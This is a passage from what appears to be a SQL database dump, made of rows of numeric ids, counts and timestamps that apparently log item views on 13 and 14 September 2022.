03:28:08'),(58571,80,1,'2022-09-13','2022-09-13 03:57:04'),(58572,80,1,'2022-09-13','2022-09-13 04:05:03'),(58573,1695,1,'2022-09-13','2022-09-13 05:03:24'),(58574,4457,1,'2022-09-13','2022-09-13 05:08:32'),(58575,4457,1,'2022-09-13','2022-09-13 05:10:01'),(58576,3791,1,'2022-09-13','2022-09-13 05:20:05'),(58577,87,1,'2022-09-13','2022-09-13 05:25:05'),(58578,4508,1,'2022-09-13','2022-09-13 06:51:22'),(58579,1606,1,'2022-09-13','2022-09-13 07:13:03'),(58580,3313,1,'2022-09-13','2022-09-13 07:34:44'),(58581,3313,1,'2022-09-13','2022-09-13 07:34:53'),(58582,1602,1,'2022-09-13','2022-09-13 08:10:08'),(58583,1602,1,'2022-09-13','2022-09-13 08:12:17'),(58584,4520,1,'2022-09-13','2022-09-13 08:27:48'),(58585,3124,1,'2022-09-13','2022-09-13 08:54:22'),(58586,3102,1,'2022-09-13','2022-09-13 08:56:19'),(58587,2775,1,'2022-09-13','2022-09-13 09:03:15'),(58588,2775,1,'2022-09-13','2022-09-13 09:04:48'),(58589,2165,1,'2022-09-13','2022-09-13 09:12:14'),(58590,2165,1,'2022-09-13','2022-09-13 09:13:28'),(58591,76,1,'2022-09-13','2022-09-13 09:20:56'),(58592,4753,1,'2022-09-13','2022-09-13 09:21:50'),(58593,3287,1,'2022-09-13','2022-09-13 09:30:02'),(58594,3060,1,'2022-09-13','2022-09-13 09:47:35'),(58595,80,1,'2022-09-13','2022-09-13 09:48:04'),(58596,72,1,'2022-09-13','2022-09-13 09:50:44'),(58597,3060,1,'2022-09-13','2022-09-13 09:50:52'),(58598,5005,1,'2022-09-13','2022-09-13 09:51:12'),(58599,4457,1,'2022-09-13','2022-09-13 10:19:18'),(58600,68,1,'2022-09-13','2022-09-13 10:21:33'),(58601,76,1,'2022-09-13','2022-09-13 10:21:38'),(58602,3430,1,'2022-09-13','2022-09-13 11:14:09'),(58603,3430,1,'2022-09-13','2022-09-13 11:14:26'),(58604,4960,1,'2022-09-13','2022-09-13 11:54:33'),(58605,4416,1,'2022-09-13','2022-09-13 12:40:06'),(58606,5005,1,'2022-09-13','2022-09-13 13:31:19'),(58607,68,1,'2022-09-13','2022-09-13 13:31:55'),(58608,5005,1,'2022-09-13','2022-09-13 13:39:42'),(58609,5005,1,'2022-09-13','2022-09-13 13:40:07'),(58610,1594,1,'2022-09-13','2022-09-13 13:41:21'),(58611,4983,1,'2022-09-13','2022-09-13 13:42:33'),(58612,4983,1,'2022-09-13','2022-09-13 13:42:37'),(58613,5005,1,'2022-09-13','2022-09-13 13:42:53'),(58614,5005,1,'2022-09-13','2022-09-13 13:43:34'),(58615,5005,1,'2022-09-13','2022-09-13 13:48:11'),(58616,5005,1,'2022-09-13','2022-09-13 14:01:05'),(58617,5005,1,'2022-09-13','2022-09-13 14:01:55'),(58618,5005,1,'2022-09-13','2022-09-13 14:01:58'),(58619,5005,1,'2022-09-13','2022-09-13 14:01:59'),(58620,5005,1,'2022-09-13','2022-09-13 14:02:09'),(58621,5005,1,'2022-09-13','2022-09-13 14:02:12'),(58622,5005,1,'2022-09-13','2022-09-13 14:02:13'),(58623,5005,1,'2022-09-13','2022-09-13 14:02:28'),(58624,5005,1,'2022-09-13','2022-09-13 14:02:31'),(58625,5005,1,'2022-09-13','2022-09-13 14:03:00'),(58626,5005,1,'2022-09-13','2022-09-13 14:03:56'),(58627,5005,1,'2022-09-13','2022-09-13 14:04:06'),(58628,5005,1,'2022-09-13','2022-09-13 14:04:10'),(58629,5005,1,'2022-09-13','2022-09-13 14:04:23'),(58630,5005,1,'2022-09-13','2022-09-13 14:04:24'),(58631,5005,1,'2022-09-13','2022-09-13 14:04:43'),(58632,5005,1,'2022-09-13','2022-09-13 14:04:52'),(58633,5005,1,'2022-09-13','2022-09-13 14:05:08'),(58634,5005,1,'2022-09-13','2022-09-13 14:05:10'),(58635,5005,1,'2022-09-13','2022-09-13 14:05:20'),(58636,5005,1,'2022-09-13','2022-09-13 14:05:37'),(58637,5005,1,'2022-09-13','2022-09-13 14:05:50'),(58638,5005,1,'2022-09-13','2022-09-13 14:06:23'),(58639,74,1,'2022-09-13','2022-09-13 14:06:43'),(58640,5005,1,'2022-09-13','2022-09-13 14:06:53'),(58641,5005,1,'2022-09-13','2022-09-13 14:07:33'),(58642,5005,1,'2022-09-13','2022-09-13 14:07:50'),(58643,2503,1,'2022-09-13','2022-09-13 14:08:22'),(58644,74,1,'2022-09-13','2022-09-13 14:08:32'),(58645,5005,1,'2022-09-13','2022-09-13 14:08:34'),(58646,2503,1,'2022-09-13','2022-09-13 14:08:50'),(58647,5005,1,'2022-09-13','2022-09-13 14:09:00'),(58648,5005,1,'2022-09-13','2022-09-13 14:09:18'),(58649,2904,1,'2022-09-13','2022-09-13 14:09:21'),(58650,5005,1,'2022-09-13','2022-09-13 14:09:43'),(58651,5005,1,'2022-09-13','2022-09-13 14:10:15'),(58652,102,1,'2022-09-13','2022-09-13 14:10:32'),(58653,5005,1,'2022-09-13','2022-09-13 14:10:42'),(58654,5005,1,'2022-09-13','2022-09-13 14:11:10'),(58655,5005,1,'2022-09-13','2022-09-13 14:12:05'),(58656,5005,1,'2022-09-13','2022-09-13 14:12:30'),(58657,5005,1,'2022-09-13','2022-09-13 14:13:00'),(58658,2904,1,'2022-09-13','2022-09-13 14:13:26'),(58659,5005,1,'2022-09-13','2022-09-13 14:13:33'),(58660,5005,1,'2022-09-13','2022-09-13 14:13:52'),(58661,5005,1,'2022-09-13','2022-09-13 14:15:13'),(58662,5005,1,'2022-09-13','2022-09-13 14:15:18'),(58663,5005,1,'2022-09-13','2022-09-13 14:15:41'),(58664,5005,1,'2022-09-13','2022-09-13 14:15:42'),(58665,5005,1,'2022-09-13','2022-09-13 14:17:14'),(58666,5005,1,'2022-09-13','2022-09-13 14:17:16'),(58667,5005,1,'2022-09-13','2022-09-13 14:17:21'),(58668,5005,1,'2022-09-13','2022-09-13 14:18:17'),(58669,5005,1,'2022-09-13','2022-09-13 14:18:23'),(58670,5005,1,'2022-09-13','2022-09-13 14:18:25'),(58671,5005,1,'2022-09-13','2022-09-13 14:18:31'),(58672,5005,1,'2022-09-13','2022-09-13 14:18:47'),(58673,5005,1,'2022-09-13','2022-09-13 14:19:06'),(58674,5005,1,'2022-09-13','2022-09-13 14:19:11'),(58675,5005,1,'2022-09-13','2022-09-13 14:19:29'),(58676,5005,1,'2022-09-13','2022-09-13 14:19:37'),(58677,5005,1,'2022-09-13','2022-09-13 14:19:48'),(58678,5005,1,'2022-09-13','2022-09-13 14:20:08'),(58679,2904,1,'2022-09-13','2022-09-13 14:20:54'),(58680,5005,1,'2022-09-13','2022-09-13 14:21:42'),(58681,2904,1,'2022-09-13','2022-09-13 14:21:42'),(58682,5005,1,'2022-09-13','2022-09-13 14:21:52'),(58683,5005,1,'2022-09-13','2022-09-13 14:21:56'),(58684,5005,1,'2022-09-13','2022-09-13 14:22:29'),(58685,5005,1,'2022-09-13','2022-09-13 14:24:22'),(58686,5005,1,'2022-09-13','2022-09-13 14:24:26'),(58687,5005,1,'2022-09-13','2022-09-13 14:24:35'),(58688,74,1,'2022-09-13','2022-09-13 14:24:42'),(58689,5005,1,'2022-09-13','2022-09-13 14:25:30'),(58690,5005,1,'2022-09-13','2022-09-13 14:26:04'),(58691,2503,1,'2022-09-13','2022-09-13 14:26:07'),(58692,5005,1,'2022-09-13','2022-09-13 14:28:12'),(58693,5005,1,'2022-09-13','2022-09-13 14:28:23'),(58694,5005,1,'2022-09-13','2022-09-13 14:31:05'),(58695,5005,1,'2022-09-13','2022-09-13 14:31:17'),(58696,5005,1,'2022-09-13','2022-09-13 14:31:34'),(58697,5005,1,'2022-09-13','2022-09-13 14:31:37'),(58698,5005,1,'2022-09-13','2022-09-13 14:31:49'),(58699,5005,1,'2022-09-13','2022-09-13 14:31:56'),(58700,5005,1,'2022-09-13','2022-09-13 14:32:48'),(58701,5005,1,'2022-09-13','2022-09-13 14:33:26'),(58702,5005,1,'2022-09-13','2022-09-13 14:35:06'),(58703,5005,1,'2022-09-13','2022-09-13 14:37:31'),(58704,5005,1,'2022-09-13','2022-09-13 14:37:47'),(58705,5005,1,'2022-09-13','2022-09-13 14:37:53'),(58706,5005,1,'2022-09-13','2022-09-13 14:38:33'),(58707,5005,1,'2022-09-13','2022-09-13 14:39:33'),(58708,5005,1,'2022-09-13','2022-09-13 14:39:54'),(58709,5005,1,'2022-09-13','2022-09-13 14:40:34'),(58710,5005,1,'2022-09-13','2022-09-13 14:40:55'),(58711,3297,1,'2022-09-13','2022-09-13 14:41:04'),(58712,5005,1,'2022-09-13','2022-09-13 14:41:17'),(58713,5005,1,'2022-09-13','2022-09-13 14:42:35'),(58714,5005,1,'2022-09-13','2022-09-13 14:42:36'),(58715,5005,1,'2022-09-13','2022-09-13 14:42:39'),(58716,5005,1,'2022-09-13','2022-09-13 14:42:41'),(58717,5005,1,'2022-09-13','2022-09-13 14:48:06'),(58718,5005,1,'2022-09-13','2022-09-13 14:48:29'),(58719,5005,1,'2022-09-13','2022-09-13 14:48:36'),(58720,2904,1,'2022-09-13','2022-09-13 14:49:22'),(58721,5005,1,'2022-09-13','2022-09-13 14:50:03'),(58722,5005,1,'2022-09-13','2022-09-13 14:50:34'),(58723,5005,1,'2022-09-13','2022-09-13 14:52:01'),(58724,5005,1,'2022-09-13','2022-09-13 14:52:34'),(58725,5005,1,'2022-09-13','2022-09-13 14:55:31'),(58726,5005,1,'2022-09-13','2022-09-13 14:55:47'),(58727,5005,1,'2022-09-13','2022-09-13 14:56:03'),(58728,1586,1,'2022-09-13','2022-09-13 14:56:34'),(58729,5005,1,'2022-09-13','2022-09-13 14:57:35'),(58730,5005,1,'2022-09-13','2022-09-13 14:57:38'),(58731,5005,1,'2022-09-13','2022-09-13 14:57:38'),(58732,5005,1,'2022-09-13','2022-09-13 14:59:10'),(58733,5005,1,'2022-09-13','2022-09-13 15:01:24'),(58734,5005,1,'2022-09-13','2022-09-13 15:02:33'),(58735,5005,1,'2022-09-13','2022-09-13 15:03:20'),(58736,5005,1,'2022-09-13','2022-09-13 15:05:56'),(58737,5005,1,'2022-09-13','2022-09-13 15:06:32'),(58738,5005,1,'2022-09-13','2022-09-13 15:09:11'),(58739,5005,1,'2022-09-13','2022-09-13 15:11:22'),(58740,1614,1,'2022-09-13','2022-09-13 15:15:02'),(58741,5005,1,'2022-09-13','2022-09-13 15:16:22'),(58742,1598,1,'2022-09-13','2022-09-13 15:16:28'),(58743,5005,1,'2022-09-13','2022-09-13 15:16:35'),(58744,2769,1,'2022-09-13','2022-09-13 15:17:00'),(58745,76,1,'2022-09-13','2022-09-13 15:17:04'),(58746,2769,1,'2022-09-13','2022-09-13 15:17:04'),(58747,1598,1,'2022-09-13','2022-09-13 15:17:23'),(58748,5005,1,'2022-09-13','2022-09-13 15:17:51'),(58749,5005,1,'2022-09-13','2022-09-13 15:18:03'),(58750,76,1,'2022-09-13','2022-09-13 15:18:34'),(58751,1598,1,'2022-09-13','2022-09-13 15:19:05'),(58752,74,1,'2022-09-13','2022-09-13 15:20:37'),(58753,5005,1,'2022-09-13','2022-09-13 15:20:48'),(58754,1598,1,'2022-09-13','2022-09-13 15:21:32'),(58755,5005,1,'2022-09-13','2022-09-13 15:22:58'),(58756,1870,1,'2022-09-13','2022-09-13 15:27:19'),(58757,5005,1,'2022-09-13','2022-09-13 15:27:25'),(58758,5005,1,'2022-09-13','2022-09-13 15:28:59'),(58759,5005,1,'2022-09-13','2022-09-13 15:30:41'),(58760,5005,1,'2022-09-13','2022-09-13 15:35:33'),(58761,5005,1,'2022-09-13','2022-09-13 15:42:38'),(58762,5005,1,'2022-09-13','2022-09-13 15:45:45'),(58763,5005,1,'2022-09-13','2022-09-13 15:45:51'),(58764,5005,1,'2022-09-13','2022-09-13 15:46:37'),(58765,76,1,'2022-09-13','2022-09-13 15:46:44'),(58766,5005,1,'2022-09-13','2022-09-13 15:47:51'),(58767,5005,1,'2022-09-13','2022-09-13 15:48:55'),(58768,5005,1,'2022-09-13','2022-09-13 15:49:08'),(58769,5005,1,'2022-09-13','2022-09-13 15:49:36'),(58770,5005,1,'2022-09-13','2022-09-13 15:50:22'),(58771,5005,1,'2022-09-13','2022-09-13 15:51:16'),(58772,5005,1,'2022-09-13','2022-09-13 15:51:41'),(58773,3313,1,'2022-09-13','2022-09-13 15:53:02'),(58774,3313,1,'2022-09-13','2022-09-13 15:53:04'),(58775,5005,1,'2022-09-13','2022-09-13 16:00:28'),(58776,4996,1,'2022-09-13','2022-09-13 16:07:40'),(58777,4238,1,'2022-09-13','2022-09-13 16:13:12'),(58778,5005,1,'2022-09-13','2022-09-13 16:16:55'),(58779,5005,1,'2022-09-13','2022-09-13 16:18:42'),(58780,5005,1,'2022-09-13','2022-09-13 16:22:39'),(58781,5005,1,'2022-09-13','2022-09-13 16:22:42'),(58782,5005,1,'2022-09-13','2022-09-13 16:23:13'),(58783,5005,1,'2022-09-13','2022-09-13 16:23:28'),(58784,2904,1,'2022-09-13','2022-09-13 16:25:31'),(58785,2904,1,'2022-09-13','2022-09-13 16:28:15'),(58786,5005,1,'2022-09-13','2022-09-13 16:28:30'),(58787,5005,1,'2022-09-13','2022-09-13 16:29:07'),(58788,5005,1,'2022-09-13','2022-09-13 16:30:54'),(58789,5005,1,'2022-09-13','2022-09-13 16:46:28'),(58790,1600,1,'2022-09-13','2022-09-13 16:48:27'),(58791,5005,1,'2022-09-13','2022-09-13 16:49:57'),(58792,1588,1,'2022-09-13','2022-09-13 16:51:43'),(58793,68,1,'2022-09-13','2022-09-13 16:52:54'),(58794,1588,1,'2022-09-13','2022-09-13 16:53:26'),(58795,5005,1,'2022-09-13','2022-09-13 17:17:13'),(58796,5005,1,'2022-09-13','2022-09-13 17:27:07'),(58797,5005,1,'2022-09-13','2022-09-13 17:29:29'),(58798,5005,1,'2022-09-13','2022-09-13 17:33:56'),(58799,5005,1,'2022-09-13','2022-09-13 17:34:55'),(58800,5005,1,'2022-09-13','2022-09-13 17:38:41'),(58801,5005,1,'2022-09-13','2022-09-13 17:42:20'),(58802,4301,1,'2022-09-13','2022-09-13 17:48:22'),(58803,5005,1,'2022-09-13','2022-09-13 17:51:35'),(58804,4963,1,'2022-09-13','2022-09-13 17:58:05'),(58805,5005,1,'2022-09-13','2022-09-13 17:58:06'),(58806,4391,1,'2022-09-13','2022-09-13 18:04:37'),(58807,5005,1,'2022-09-13','2022-09-13 18:08:33'),(58808,76,1,'2022-09-13','2022-09-13 18:09:19'),(58809,5005,1,'2022-09-13','2022-09-13 18:09:42'),(58810,5005,1,'2022-09-13','2022-09-13 18:11:10'),(58811,5005,1,'2022-09-13','2022-09-13 18:26:16'),(58812,5005,1,'2022-09-13','2022-09-13 18:41:23'),(58813,5005,1,'2022-09-13','2022-09-13 18:41:36'),(58814,4520,1,'2022-09-13','2022-09-13 18:53:33'),(58815,4520,1,'2022-09-13','2022-09-13 18:53:35'),(58816,5005,1,'2022-09-13','2022-09-13 18:58:52'),(58817,2809,1,'2022-09-13','2022-09-13 19:17:59'),(58818,5005,1,'2022-09-13','2022-09-13 19:35:16'),(58819,5005,1,'2022-09-13','2022-09-13 19:37:13'),(58820,5005,1,'2022-09-13','2022-09-13 19:42:17'),(58821,2751,1,'2022-09-13','2022-09-13 19:42:20'),(58822,2751,1,'2022-09-13','2022-09-13 19:42:21'),(58823,5005,1,'2022-09-13','2022-09-13 20:05:29'),(58824,4980,1,'2022-09-13','2022-09-13 20:08:31'),(58825,5005,1,'2022-09-13','2022-09-13 20:34:00'),(58826,1594,1,'2022-09-13','2022-09-13 20:35:52'),(58827,1594,1,'2022-09-13','2022-09-13 20:35:54'),(58828,1711,1,'2022-09-13','2022-09-13 21:05:07'),(58829,5005,1,'2022-09-13','2022-09-13 21:20:22'),(58830,5005,1,'2022-09-13','2022-09-13 21:21:21'),(58831,5005,1,'2022-09-13','2022-09-13 21:24:13'),(58832,5005,1,'2022-09-13','2022-09-13 21:29:15'),(58833,5005,1,'2022-09-13','2022-09-13 21:29:20'),(58834,5005,1,'2022-09-13','2022-09-13 21:30:08'),(58835,5005,1,'2022-09-13','2022-09-13 21:30:24'),(58836,5005,1,'2022-09-13','2022-09-13 21:32:38'),(58837,5005,1,'2022-09-13','2022-09-13 21:33:24'),(58838,5005,1,'2022-09-13','2022-09-13 21:33:43'),(58839,74,1,'2022-09-13','2022-09-13 21:34:24'),(58840,4988,1,'2022-09-13','2022-09-13 21:34:33'),(58841,74,1,'2022-09-13','2022-09-13 21:34:52'),(58842,5005,1,'2022-09-13','2022-09-13 21:35:27'),(58843,5005,1,'2022-09-13','2022-09-13 21:35:56'),(58844,5005,1,'2022-09-13','2022-09-13 21:36:35'),(58845,5005,1,'2022-09-13','2022-09-13 21:40:23'),(58846,5005,1,'2022-09-13','2022-09-13 21:40:29'),(58847,4988,1,'2022-09-13','2022-09-13 21:42:40'),(58848,5005,1,'2022-09-13','2022-09-13 21:46:00'),(58849,5005,1,'2022-09-13','2022-09-13 21:46:48'),(58850,5005,1,'2022-09-13','2022-09-13 21:48:56'),(58851,5005,1,'2022-09-13','2022-09-13 21:52:56'),(58852,5005,1,'2022-09-13','2022-09-13 21:54:13'),(58853,2161,1,'2022-09-13','2022-09-13 22:03:31'),(58854,5005,1,'2022-09-13','2022-09-13 22:04:54'),(58855,5005,1,'2022-09-13','2022-09-13 22:05:55'),(58856,5005,1,'2022-09-13','2022-09-13 22:12:07'),(58857,5005,1,'2022-09-13','2022-09-13 22:18:27'),(58858,5005,1,'2022-09-13','2022-09-13 22:23:56'),(58859,5005,1,'2022-09-13','2022-09-13 22:24:57'),(58860,5005,1,'2022-09-13','2022-09-13 22:31:51'),(58861,5005,1,'2022-09-13','2022-09-13 22:36:35'),(58862,469,1,'2022-09-13','2022-09-13 22:37:53'),(58863,89,1,'2022-09-13','2022-09-13 22:47:21'),(58864,5005,1,'2022-09-13','2022-09-13 23:05:24'),(58865,2159,1,'2022-09-13','2022-09-13 23:07:58'),(58866,5005,1,'2022-09-13','2022-09-13 23:12:49'),(58867,5005,1,'2022-09-13','2022-09-13 23:14:14'),(58868,5005,1,'2022-09-13','2022-09-13 23:14:50'),(58869,5005,1,'2022-09-13','2022-09-13 23:20:29'),(58870,4971,1,'2022-09-13','2022-09-13 23:31:13'),(58871,5005,1,'2022-09-13','2022-09-13 23:39:16'),(58872,5005,1,'2022-09-13','2022-09-13 23:46:23'),(58873,5005,1,'2022-09-13','2022-09-13 23:46:50'),(58874,5005,1,'2022-09-13','2022-09-13 23:48:22'),(58875,74,1,'2022-09-13','2022-09-13 23:48:47'),(58876,5005,1,'2022-09-13','2022-09-13 23:51:29'),(58877,5005,1,'2022-09-14','2022-09-14 00:05:59'),(58878,2904,1,'2022-09-14','2022-09-14 00:07:04'),(58879,5005,1,'2022-09-14','2022-09-14 00:10:43'),(58880,5005,1,'2022-09-14','2022-09-14 00:11:15'),(58881,5005,1,'2022-09-14','2022-09-14 00:12:54'),(58882,5005,1,'2022-09-14','2022-09-14 00:17:20'),(58883,5005,1,'2022-09-14','2022-09-14 00:17:49'),(58884,5005,1,'2022-09-14','2022-09-14 00:24:35'),(58885,5005,1,'2022-09-14','2022-09-14 00:25:43'),(58886,5005,1,'2022-09-14','2022-09-14 00:32:41'),(58887,5005,1,'2022-09-14','2022-09-14 00:45:57'),(58888,5005,1,'2022-09-14','2022-09-14 01:37:48'),(58889,2904,1,'2022-09-14','2022-09-14 01:40:09'),(58890,2904,1,'2022-09-14','2022-09-14 01:41:08'),(58891,2769,1,'2022-09-14','2022-09-14 01:41:14'),(58892,2904,1,'2022-09-14','2022-09-14 01:41:23'),(58893,5005,1,'2022-09-14','2022-09-14 01:41:27'),(58894,3313,1,'2022-09-14','2022-09-14 02:13:42'),(58895,3313,1,'2022-09-14','2022-09-14 02:13:46'),(58896,472,1,'2022-09-14','2022-09-14 02:20:14'),(58897,472,1,'2022-09-14','2022-09-14 02:23:13'),(58898,3102,1,'2022-09-14','2022-09-14 02:47:19'),(58899,5005,1,'2022-09-14','2022-09-14 02:47:51'),(58900,5005,1,'2022-09-14','2022-09-14 02:48:19'),(58901,5005,1,'2022-09-14','2022-09-14 02:56:04'),(58902,5005,1,'2022-09-14','2022-09-14 02:57:18'),(58903,5005,1,'2022-09-14','2022-09-14 03:45:27'),(58904,5005,1,'2022-09-14','2022-09-14 04:00:13'),(58905,5005,1,'2022-09-14','2022-09-14 04:04:27'),(58906,5005,1,'2022-09-14','2022-09-14 04:06:26'),(58907,4520,1,'2022-09-14','2022-09-14 04:37:37'),(58908,5005,1,'2022-09-14','2022-09-14 05:01:01'),(58909,4893,1,'2022-09-14','2022-09-14 05:03:00'),(58910,5005,1,'2022-09-14','2022-09-14 05:23:16'),(58911,5005,1,'2022-09-14','2022-09-14 05:35:36'),(58912,4612,1,'2022-09-14','2022-09-14 06:08:59'),(58913,4980,1,'2022-09-14','2022-09-14 06:15:22'),(58914,5005,1,'2022-09-14','2022-09-14 06:37:52'),(58915,5005,1,'2022-09-14','2022-09-14 06:38:17'),(58916,5005,1,'2022-09-14','2022-09-14 06:42:48'),(58917,4827,1,'2022-09-14','2022-09-14 06:44:40'),(58918,1776,1,'2022-09-14','2022-09-14 07:05:21'),(58919,5005,1,'2022-09-14','2022-09-14 07:06:36'),(58920,3707,1,'2022-09-14','2022-09-14 07:11:29'),(58921,4510,1,'2022-09-14','2022-09-14 07:28:11'),(58922,1724,1,'2022-09-14','2022-09-14 07:39:39'),(58923,5005,1,'2022-09-14','2022-09-14 07:52:35'),(58924,1776,1,'2022-09-14','2022-09-14 07:54:29'),(58925,5005,1,'2022-09-14','2022-09-14 07:54:40'),(58926,471,1,'2022-09-14','2022-09-14 08:04:58'),(58927,5005,1,'2022-09-14','2022-09-14 08:11:02'),(58928,89,1,'2022-09-14','2022-09-14 08:11:23'),(58929,89,1,'2022-09-14','2022-09-14 08:11:25'),(58930,5005,1,'2022-09-14','2022-09-14 08:13:05'),(58931,3482,1,'2022-09-14','2022-09-14 08:17:21'),(58932,5005,1,'2022-09-14','2022-09-14 08:20:48'),(58933,5005,1,'2022-09-14','2022-09-14 08:20:50'),(58934,76,1,'2022-09-14','2022-09-14 08:21:42'),(58935,3005,1,'2022-09-14','2022-09-14 08:23:22'),(58936,4391,1,'2022-09-14','2022-09-14 08:29:31'),(58937,1600,1,'2022-09-14','2022-09-14 08:35:40'),(58938,1732,1,'2022-09-14','2022-09-14 08:42:16'),(58939,3285,1,'2022-09-14','2022-09-14 08:47:54'),(58940,3285,1,'2022-09-14','2022-09-14 08:47:56'),(58941,5005,1,'2022-09-14','2022-09-14 08:58:38'),(58942,3104,1,'2022-09-14','2022-09-14 09:00:23'),(58943,1720,1,'2022-09-14','2022-09-14 09:06:20'),(58944,5005,1,'2022-09-14','2022-09-14 09:11:31'),(58945,5005,1,'2022-09-14','2022-09-14 09:12:47'),(58946,5005,1,'2022-09-14','2022-09-14 09:15:49'),(58947,5005,1,'2022-09-14','2022-09-14 09:15:54'),(58948,76,1,'2022-09-14','2022-09-14 09:16:39'),(58949,2154,1,'2022-09-14','2022-09-14 09:18:39'),(58950,2154,1,'2022-09-14','2022-09-14 09:18:54'),(58951,1612,1,'2022-09-14','2022-09-14 09:24:11'),(58952,5005,1,'2022-09-14','2022-09-14 09:27:07'),(58953,5005,1,'2022-09-14','2022-09-14 09:31:52'),(58954,5005,1,'2022-09-14','2022-09-14 09:45:51'),(58955,5005,1,'2022-09-14','2022-09-14 09:47:35'),(58956,5005,1,'2022-09-14','2022-09-14 09:47:55'),(58957,5005,1,'2022-09-14','2022-09-14 09:48:19'),(58958,4976,1,'2022-09-14','2022-09-14 09:48:22'),(58959,4976,1,'2022-09-14','2022-09-14 09:48:27'),(58960,5005,1,'2022-09-14','2022-09-14 09:49:07'),(58961,5005,1,'2022-09-14','2022-09-14 09:50:45'),(58962,5005,1,'2022-09-14','2022-09-14 09:51:28'),(58963,5005,1,'2022-09-14','2022-09-14 10:15:23'),(58964,5005,1,'2022-09-14','2022-09-14 10:17:47'),(58965,4551,1,'2022-09-14','2022-09-14 10:18:08'),(58966,1602,1,'2022-09-14','2022-09-14 10:20:44'),(58967,1602,1,'2022-09-14','2022-09-14 10:22:41'),(58968,5005,1,'2022-09-14','2022-09-14 10:42:57'),(58969,5005,1,'2022-09-14','2022-09-14 11:05:31'),(58970,5005,1,'2022-09-14','2022-09-14 11:07:34'),(58971,5005,1,'2022-09-14','2022-09-14 11:10:27'),(58972,5005,1,'2022-09-14','2022-09-14 11:18:46'),(58973,5005,1,'2022-09-14','2022-09-14 11:19:06'),(58974,4546,1,'2022-09-14','2022-09-14 11:32:32'),(58975,5005,1,'2022-09-14','2022-09-14 11:33:59'),(58976,5005,1,'2022-09-14','2022-09-14 11:46:19'),(58977,4983,1,'2022-09-14','2022-09-14 11:47:03'),(58978,4983,1,'2022-09-14','2022-09-14 11:49:03'),(58979,3107,1,'2022-09-14','2022-09-14 12:24:50'),(58980,5005,1,'2022-09-14','2022-09-14 12:31:47'),(58981,5005,1,'2022-09-14','2022-09-14 12:35:04'),(58982,5005,1,'2022-09-14','2022-09-14 12:42:43'),(58983,5005,1,'2022-09-14','2022-09-14 13:09:11'),(58984,5005,1,'2022-09-14','2022-09-14 13:21:59'),(58985,4963,1,'2022-09-14','2022-09-14 13:37:51'),(58986,4930,1,'2022-09-14','2022-09-14 13:46:41'),(58987,84,1,'2022-09-14','2022-09-14 13:46:59'),(58988,87,1,'2022-09-14','2022-09-14 13:47:32'),(58989,5005,1,'2022-09-14','2022-09-14 13:50:53'),(58990,68,1,'2022-09-14','2022-09-14 14:00:24'),(58991,1600,1,'2022-09-14','2022-09-14 14:02:02'),(58992,87,1,'2022-09-14','2022-09-14 14:04:36'),(58993,89,1,'2022-09-14','2022-09-14 14:04:49'),(58994,89,1,'2022-09-14','2022-09-14 14:09:03'),(58995,5005,1,'2022-09-14','2022-09-14 14:10:39'),(58996,5005,1,'2022-09-14','2022-09-14 14:12:59'),(58997,89,1,'2022-09-14','2022-09-14 14:26:33'),(58998,89,1,'2022-09-14','2022-09-14 14:27:12'),(58999,89,1,'2022-09-14','2022-09-14 14:30:34'),(59000,89,1,'2022-09-14','2022-09-14 14:35:06'),(59001,89,1,'2022-09-14','2022-09-14 14:37:35'),(59002,89,1,'2022-09-14','2022-09-14 14:44:29'),(59003,89,1,'2022-09-14','2022-09-14 14:44:48'),(59004,3771,1,'2022-09-14','2022-09-14 14:46:11'),(59005,3771,1,'2022-09-14','2022-09-14 14:49:55'),(59006,1604,1,'2022-09-14','2022-09-14 15:16:17'),(59007,4520,1,'2022-09-14','2022-09-14 15:18:13'),(59008,5005,1,'2022-09-14','2022-09-14 15:19:24'),(59009,5005,1,'2022-09-14','2022-09-14 15:22:02'),(59010,5005,1,'2022-09-14','2022-09-14 15:27:39'),(59011,5005,1,'2022-09-14','2022-09-14 15:27:50'),(59012,1722,1,'2022-09-14','2022-09-14 15:36:52'),(59013,5005,1,'2022-09-14','2022-09-14 16:06:36'),(59014,89,1,'2022-09-14','2022-09-14 16:09:14'),(59015,1596,1,'2022-09-14','2022-09-14 16:18:57'),(59016,1596,1,'2022-09-14','2022-09-14 16:26:56'),(59017,1596,1,'2022-09-14','2022-09-14 16:32:21'),(59018,5005,1,'2022-09-14','2022-09-14 16:33:20'),(59019,1596,1,'2022-09-14','2022-09-14 16:33:30'),(59020,1596,1,'2022-09-14','2022-09-14 16:33:52'),(59021,5005,1,'2022-09-14','2022-09-14 16:43:47'),(59022,1586,1,'2022-09-14','2022-09-14 16:54:38'),(59023,5005,1,'2022-09-14','2022-09-14 17:00:18'),(59024,108,1,'2022-09-14','2022-09-14 17:02:26'),(59025,1586,1,'2022-09-14','2022-09-14 17:04:19'),(59026,1586,1,'2022-09-14','2022-09-14 17:07:28'),(59027,108,1,'2022-09-14','2022-09-14 17:10:21'),(59028,2769,1,'2022-09-14','2022-09-14 17:11:34'),(59029,108,1,'2022-09-14','2022-09-14 17:13:50'),(59030,2165,1,'2022-09-14','2022-09-14 17:22:58'),(59031,3694,1,'2022-09-14','2022-09-14 17:27:09'),(59032,89,1,'2022-09-14','2022-09-14 17:28:16'),(59033,1544,1,'2022-09-14','2022-09-14 17:30:18'),(59034,5005,1,'2022-09-14','2022-09-14 17:32:17'),(59035,1772,1,'2022-09-14','2022-09-14 17:38:37'),(59036,89,1,'2022-09-14','2022-09-14 17:45:55'),(59037,1584,1,'2022-09-14','2022-09-14 17:46:02'),(59038,2617,1,'2022-09-14','2022-09-14 17:47:14'),(59039,89,1,'2022-09-14','2022-09-14 18:05:48'),(59040,1586,1,'2022-09-14','2022-09-14 18:05:57'),(59041,89,1,'2022-09-14','2022-09-14 18:08:00'),(59042,1602,1,'2022-09-14','2022-09-14 18:34:44'),(59043,1602,1,'2022-09-14','2022-09-14 18:34:49'),(59044,3271,1,'2022-09-14','2022-09-14 18:40:27'),(59045,5005,1,'2022-09-14','2022-09-14 18:46:21'),(59046,5005,1,'2022-09-14','2022-09-14 18:49:53'),(59047,5005,1,'2022-09-14','2022-09-14 18:55:26'),(59048,5005,1,'2022-09-14','2022-09-14 19:17:08'),(59049,5005,1,'2022-09-14','2022-09-14 19:31:48'),(59050,1586,1,'2022-09-14','2022-09-14 19:38:20'),(59051,1586,1,'2022-09-14','2022-09-14 20:05:21'),(59052,89,1,'2022-09-14','2022-09-14 20:08:29'),(59053,1588,1,'2022-09-14','2022-09-14 20:08:36'),(59054,3104,1,'2022-09-14','2022-09-14 22:39:41'),(59055,3034,1,'2022-09-14','2022-09-14 